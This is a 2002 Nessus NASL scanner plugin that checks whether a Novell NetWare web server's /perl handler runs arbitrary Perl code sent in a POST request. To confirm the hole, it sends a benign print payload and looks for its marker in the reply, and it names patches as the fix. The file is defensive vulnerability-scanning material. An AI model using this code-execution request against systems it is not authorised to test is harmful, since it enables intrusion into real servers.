# (c) 2002 visigoth <visigoth@securitycentric.com>
# this script is distributed under a BSD style license
# allowing free use and continued development provided
# the above Copyright message remains.


#
#
# REGISTER
#
if(description)
{
 script_id(11158);
 script_version ("$Id: netware_post_perl.nasl,v 1.1.2.1 2002/11/21 17:06:36 renaud Exp $");
 script_bugtraq_id(5520);
 #script_cve_id(""); They'll catch up eventually...
 
 name["english"] = "Novell NetWare HTTP POST Perl Code Execution Vulnerability";
 script_name(english:name["english"]);
 
 desc["english"] = "
Novell Netware contains multiple default web server installations.  
The Netware Enterprise Web Server (Netscape/IPlanet) has a perl 
handler which will run arbitrary code given to in a POST request 
version 5.x (through SP4) and 6.x (through SP1) are effected.

Risk factor : High

Solution : Install 5.x SP5 or 6.0 SP2

Additionally, the enterprise manager web interface may be used to
unmap the /perl handler entirely.  If it is not being used, minimizing
this service would be appropriate.";

 script_description(english:desc["english"]);
 
 summary["english"] = "Webserver perl handler executes arbitrary POSTs";
 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2002 visigoth");

 family["english"] = "Netware";
 script_family(english:family["english"], francais:family["francais"]);

 script_dependencie("find_service.nes");
 script_require_ports("Services/www",80,2200);
 exit(0);
}

#
# ATTACK
#

include("http_func.inc");

port = get_kb_item("Services/www");

if(!port)port = 80;
if (! get_port_state(port)) port = 2200;
if (! get_port_state(port)) exit(0);

sock = http_open_socket(port);
if (! sock) exit(0);

http_POST = string("POST /perl/ HTTP/1.1\nContent-Type: application/octet-stream\nHost: ", get_host_name(), "Content-Length: ");

perl_code = string("print") + raw_string(0x28,0x22) + "Content-type: text/plain\n visigoth\n\n" + raw_string(0x22,0x29,0x3b);

length = strlen(perl_code);

send(socket:sock, data:string(http_POST, length ,"\n\n",  perl_code));

rcv = recv(socket:sock, length:1024);
if(!rcv) exit(0);
http_close_socket(sock);

if(ereg(pattern:"visigoth", string:rcv))
{
	security_hole(port);
}
